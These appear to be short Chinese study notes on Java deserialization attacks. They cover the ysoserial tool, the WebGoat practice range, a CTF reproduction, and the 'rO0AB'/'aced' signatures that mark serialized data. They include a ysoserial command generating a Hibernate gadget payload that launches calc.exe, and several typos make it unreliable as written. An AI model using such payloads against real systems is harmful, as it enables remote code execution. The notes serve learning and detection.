有个工具,ysoserial:https://github.com/frohoff/ysoserial
概念 序列化和反序列化序列化 (serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。
反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。
靶场:webGoat https://blog.csdn.net/weixin_45539802/article/details/112298156
演示案例:Java反序列化及命令执行代码测试
WebGoat_Javaweb靶场反序列化测试
java -Dhibexnate5 -cp hibernate- core-5.4.9.Final.jar;ysoserial-master-30099844c6-1.jar ysoserial.GeneratePayload Hibernatel calc.exe > payload.bin
2020-网鼎杯-朱雀组-Web-think_java真题复现
下方的特征可以作为序列化的标志参考:
—段数据以rO0AB开头。你基本可以确定这串就是JAMA序列化base64加密的数据。或者如果以aced开头,那么他就是这一段java序列化的16进制。|
